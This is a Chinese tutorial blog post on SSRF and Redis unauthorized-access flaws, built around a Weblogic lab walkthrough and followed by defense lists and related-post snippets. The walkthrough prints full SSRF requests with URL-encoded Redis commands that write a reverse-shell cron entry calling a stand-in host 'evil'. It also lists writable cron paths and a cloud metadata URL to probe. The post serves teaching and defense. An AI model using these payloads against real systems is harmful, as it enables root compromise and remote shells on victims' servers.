深入解析SSRF和Redis未授权访问

最新推荐文章于 2024-08-25 17:44:01 发布
最新推荐文章于 2024-08-25 17:44:01 发布
阅读量1k 收藏 12
点赞数 30
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66993332/article/details/141503291
版权

深入解析SSRF和Redis未授权访问:漏洞分析与防御

在网络安全领域,服务器端请求伪造(SSRF)Redis未授权访问 是两类常见且危险的安全漏洞。

1.2 SSRF攻击的利用

1.2.1 测试并确认SSRF漏洞

一个典型的例子是,当应用程序允许用户输入一个外部URL来获取数据时,攻击者可以输入一个指向内部资源的URL,来测试是否存在SSRF漏洞。

http://127.0.0.1/admin
http://169.254.169.254/latest/meta-data/ # 获取AWS元数据

在应用程序没有对用户输入的URL进行严格校验的情况下,攻击者可以利用SSRF漏洞访问内部管理接口或者获取云平台的元数据信息。

Weblogic SSRF漏洞

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境搭建

编译及启动测试环境

docker compose up -d

访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。

SSRF漏洞测试

SSRF漏洞存在于http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type

通过错误的不同,即可探测内网状态。

注入HTTP头,利用Redis反弹shell

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发现172.18.0.2:6379可以连通:

 

发送三条redis命令,将弹shell脚本写入/etc/crontab

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

最后也是成功反弹:

补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件

1.3 SSRF的防御措施

  1. 限制请求的目的地:应用程序应严格限制外部请求的目标,避免请求内部资源,如localhost127.0.0.1、内网IP等。

  2. 使用白名单机制:只允许访问预定义的外部资源,所有其他请求都应被拒绝。

  3. 加强URL校验:在接受用户输入的URL前,应该进行严格的校验,防止恶意URL被利用。

  4. 网络层面防护:使用防火墙或其他网络安全设备,阻止从应用服务器发出的可疑请求

二、Redis未授权访问漏洞解析

2.1 Redis未授权访问的基本概念

Redis是一种高性能的键值对存储系统,常用于缓存、消息队列等场景。如果Redis实例未设置访问控制(即未授权访问),攻击者可以直接连接到Redis实例并执行任意命令,从而读取、修改数据,甚至通过恶意命令执行攻击。

2.2 Redis未授权访问的利用

2.2.1 漏洞检测

攻击者可以通过扫描内网或公共网络,查找暴露的Redis实例。如果实例未设置密码,攻击者可以直接使用redis-cli连接到Redis实例,并执行命令。

info 可以查看redis信息
192.168.112.188:6379> info
# Server
redis_version:3.2.12
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:7897e7d0e13773f
redis_mode:standalone
os:Linux 3.10.0-1160.el7.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.8.5
process_id:4041
run_id:c8f79de1339bff6106652b1f3e64de2df1508b19
tcp_port:6379
uptime_in_seconds:19
uptime_in_days:0
hz:10
lru_clock:2727876
executable:/usr/bin/redis-server
config_file:/etc/redis.conf

2.3 Redis未授权访问的防御措施

  1. 设置访问密码:在Redis配置文件中启用requirepass设置,强制用户在连接Redis时提供密码。

  2. 限制访问IP:将Redis服务绑定到本地或特定的内网IP,避免暴露在公网或不受信任的网络中。

  3. 定期安全审计:定期检查Redis的配置和访问日志,确保不存在未授权的访问。

  4. 使用防火墙:通过防火墙限制对Redis端口的访问,只允许可信的IP范围连接。

三、总结

SSRF和Redis未授权访问是两类常见但极具威胁的安全漏洞。在实际的渗透测试中,攻防双方都应对这些漏洞保持高度警惕。通过合理的安全配置、严格的输入校验、以及定期的安全审计,可以有效降低这些漏洞被利用的风险。

希望通过本文的详细分析和图示,大家能对SSRF和Redis未授权访问有更深刻的理解,并能在实际工作中有效防御这些威胁。

Healer。。
关注
redis数据库非授权访问-SSRF
千寻的博客
02-09 1098
文章目录第一步 :获取镜像第二步 启动docker镜像第三步:登录docker镜像第四步:访问weblogic(7001端口)第五步:存在SSRF 漏洞抓到的数据包进行内网的探测补充:redis 数据库第六步 通过读写计划任务文件crontab反弹Shell 到指定地址url编码burp里面提交第七步 第六步的同时设置监听 第一步 :获取镜像 [cd Desktop/] [cd vulhub-ma...
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
组合拳SSRF+redis授权访问
求大佬师傅带
09-15 619
组合拳SSRF+redis授权访问
SSRF简介及漏洞实现
最新发布
2301_80177550的博客
08-25 730
可以看到这块的本地ip地址暴露出来,那么就绕过了127.0.0.1和localhost了,我们用http协议先试下能不能探测出端口,因为探测端口我们在前端看不出什么信息,那使用bp快速爆破下,查看报文的长度看能否爆出一些信息。image=URL]接着想,在真实项目中,不太可能只有一台主机,在一个内网中是有很多主机,并且地址也是同网段或者连续的,既然这个主机没有我们找到漏洞,那我们扫一下有没有别的主机就行。一般情况下,都是放在/var/www/html下面,但不保证他会不会改,一般都是怕麻烦不会改的。
ssrf+redis授权靶场
actistsec的博客
10-25 2123
自己搭建不太合理的ssrf联动redis授权
dedis&weblogic ssrf利用redis授权反弹shell
Feng_Blue_的博客
10-27 445
本文仅提供于学术探讨,如有后果自行承担。 redis数据库授权访问漏洞复现 启用漏洞环境 借助工具来进行操作 查看基本帮助 weblogic ssrf利用redis授权访问反弹shell
再探SSRF服务器请求伪造(weblogic cve ssrf redis授权
Love&Share
04-26 1万+
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用:https://vulhub.org/#/docs/run/ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Jav
渗透测试笔记——收集于网络
08-05
例如,文档提到了SSRF漏洞、授权访问问题和WAF的防御方法。这些内容为安全人员提供了如何在渗透测试中识别和防范相关威胁的思路。 渗透测试伦理与风险提示 渗透测试笔记的开始部分明确提示,所有渗透测试活动应在...
红队系列-SRC常用漏洞挖掘技巧
aming小老弟
12-08 1483
安全弱点sql 注入命令 注入深入利用xpath注入 (老式 ) 广泛了解乌云镜像薅羊毛。
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1793
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1251
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
利用Weblogic中间件存在的SSRF漏洞结合redis授权访问漏洞GetShell
wenqingshuo321的博客
10-11 799
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2454
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
漏洞原理——ssrf
nobugnomoney的博客
04-04 2万+
一、什么是SSRF 1、简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。 攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部
网络安全-SSRF漏洞原理、攻击与防御
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5867
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
SSFR概念及简单使用(超详讲)
weixin_59047731的博客
11-27 865
SSRF漏洞就是通过篡改获取资源的请求发送给服务器但是服务器并没有检测这个请求是否合法的然后服务器以他的身份来访问其他服务器的资源。
SSRF
ws1813004226的博客
05-17 4198
一、SSRF是什么? SSRF是由一种攻击者构造请求,由服务器端发起请求的安全漏洞。一般情况下SSRF的攻击目标是外网无法访问到的内部系统。(正因为请求是由服务器发起的,所以服务器端能请求到与自身相连而与外网隔离的内部系统。) 二、SSRF是怎样形成的? SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 三、SSRF主要攻击方式 (1)对外网,服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。 (2)攻击运行在内网或本地的应用程序。 (3)对内
SSRF漏洞基础讲解
m0_60571990的博客
12-07 1780
SSRF漏洞基础讲解
SSRF+redis
08-24
SSRF redis是指通过Server-Side Request Forgery (SSRF)攻击技术利用redis授权访问漏洞的组合。SSRF漏洞可以让攻击者发送伪造的请求,使服务器在攻击者的控制下发送请求到内部网络或其他外部系统。而redis授权访问漏洞指的是redis数据库经任何身份验证就可以被访问和控制的漏洞。通过这两种漏洞的结合,攻击者可以利用SSRF漏洞请求含有授权访问漏洞的redis,然后通过redis的数据备份功能将恶意代码写入服务器的定时文件中,最终实现反弹shell攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ssrf+redis](https://blog.csdn.net/qq_45213259/article/details/110352124)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [SSRF+Redis组合拳啊哒~](https://blog.csdn.net/qq_43665434/article/details/115408269)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值